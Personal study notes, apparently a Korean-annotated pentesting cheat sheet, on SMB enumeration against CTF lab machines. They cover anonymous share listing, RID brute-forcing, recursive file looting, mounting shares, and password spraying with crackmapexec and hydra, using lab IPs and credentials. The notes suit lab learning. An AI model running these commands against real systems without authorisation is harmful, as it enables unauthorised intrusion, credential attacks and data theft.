139,445 - Pentesting SMB

Smb ์—ด๊ฑฐ ์‹œ ์œ ์ €๋‚˜ ํŒจ์Šค์›Œ๋“œ์— ์•„๋ฌด๊ฑฐ๋‚˜ ์ž…๋ ฅํ•ด์„œ๋ผ๋„ ํ•œ๋ฒˆ ํ™•์ธํ•˜

โ”Œโ”€โ”€โ”€(root@kali-container-upgrade)-[~/tools/impacket]
โ””โ”€# sudo python3 lookupsid.py thm.corp/guest:@10.10.171.244
#์„ฑ
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at 10.10.171.244
[*] StringBinding ncacn_np:10.10.171.244[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1966530601-3185510712-10604624
498: THM\Enterprise Read-only Domain Controllers (SidTypeGrou

enum4linux -a 10.10.10.100 #-a : ๋ชจ๋“  ์ •๋ณด ๊ฐ€์ ธ์˜ค๊ธฐ 
smbmap -H 10.10.10.100 
smbclient //10.10.10.100/Replication -U ""%""  #-U๋Š” ์‚ฌ์šฉ์ž ์ธ์ฆ ์ •๋ณด ์ง€์ • ์˜ต์…˜ (์œ ์ € ์•„์ด๋”” ๊ฐ™์€ ๊ฒƒ) but ์—ฌ๊ธฐ์„œ๋Š” ๋นˆ๋ฌธ์ž์—ด ""%""์„ ์‚ฌ์šฉํ•˜์—ฌ ์ต๋ช…์œผ๋กœ ์ ‘์†
smbmap -H 10.10.10.100 -r #๊ณต์œ ๊ฐ€๋Šฅํ•œ ํด๋” ์žฌ๊ท€์ ์œผ๋กœ ๋‚˜์—ด 
crackmapexec smb support.htb #ํ˜ธ์ŠคํŠธ ์ด๋ฆ„๊ณผ ๋„๋ฉ”์ธ ํ‘œ์‹œ 
crackmapexec smb support.htb --shares #๊ณต์œ ๊ฐ€๋Šฅํ•œ ํด๋” ๋ชจ๋‘ ํ‘œ์‹œ 
crackmapexec smb <target_ip_range> --shares -u '' -p ''

smbclient -N -L //support.htb #-N : ์ธ์ฆ ์—†์ด, -L : ํ˜ธ์ŠคํŠธ์˜ ๊ณต์œ  ๋ชฉ๋ก ํ‘œ์‹œ
smbclient --no-pass //10.10.11.202/public #์ต๋ช… ๋กœ๊ทธ์ธ
smbclient ////10.10.11.202 -U sql_svc%REGGIE1234ronnie
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget * #์ด๋Ÿฌ๋ฉด ๊ฐ ๊ณต์œ ์— ์žˆ๋Š” ๋ชจ๋“  ํŒŒ์ผ ๋‹ค์šด ๊ฐ€๋Šฅ
smb: \> get "SQL Server Procedures.pdf" /root/Downloads/HTB/machine/Escape/txt.txt
#ํŒŒ์ผ ๋‹ค์šด ๋ช…๋ น์–ด
#๋‹ค์šด๋กœ๋“œํ•œ ํด๋”์—์„œ ํŒŒ์ผ ์ฐพ๋Š” ๋ช…๋ น์–ด 
find smb-data-loot/ -type f

mount -t cifs //10.10.10.192/profiles$ /mnt #ํŒŒ์ผ ๋งˆ์šดํŠธ ๋ช…๋ น์–ด
#-t cifs: ๋งˆ์šดํŠธํ•  ํŒŒ์ผ ์‹œ์Šคํ…œ์˜ ์œ ํ˜•์„ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ๋Š” CIFS๋ฅผ ์‚ฌ์šฉํ•˜๋ฏ€๋กœ -t cifs๋กœ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค.
sudo umount ./blackfield/smb # unmount

#smb ์ต๋ช… ๋กœ๊ทธ์ธ
โ”Œโ”€โ”€โ”€(root@kali-container-upgrade)-[~/Downloads/HTB/machine/Reset]
โ””โ”€# smbclient -N -L //10.10.171.244/Data

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.171.244 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
โ”Œโ”€โ”€โ”€(root@kali-container-upgrade)-[~/Downloads/HTB/machine/Reset]
โ””โ”€# smbclient //10.10.171.244/Data -N 
Try "help" to get a list of possible commands.
smb: \> 

๋กœ์ปฌ ์‚ฌ์šฉ์ž ์—ด๊ฑฐ
์ž„ํŒจํ‚ท

python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
// SMB ๋ช…๋ น์–ดcode
get <ํŒŒ์ผ๋ช…> #ํŒŒ์ผ ๋‹ค์šด ๋ช…๋ น์–ด 
put <file name > #file upload command

๋น„๋ฐ€๋ฒˆํ˜ธ ์Šคํ”„๋ ˆ์ด

  • ๋งŽ์€ ์‚ฌ์šฉ์ž๋“ค์—๊ฒŒ ํ•˜๋‚˜์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋Œ€์ž…ํ•˜๋Š” ๊ฒƒ

crackmapexec smb 10.10.10.169 -u users -p 'Welcome123!' --shares --continue-on-success

hydra -L user.list -P password.list smb://10.129.42.197

msf - smb_login ๋ชจ๋“ˆ ์‚ฌ์šฉ 

RID ์—ด๊ฑฐ

crackmapexec smb thm.corp -u uest -p '' --rid-brute

sudo python3 lookupsid.py guest:@10.10.171.244

Last updated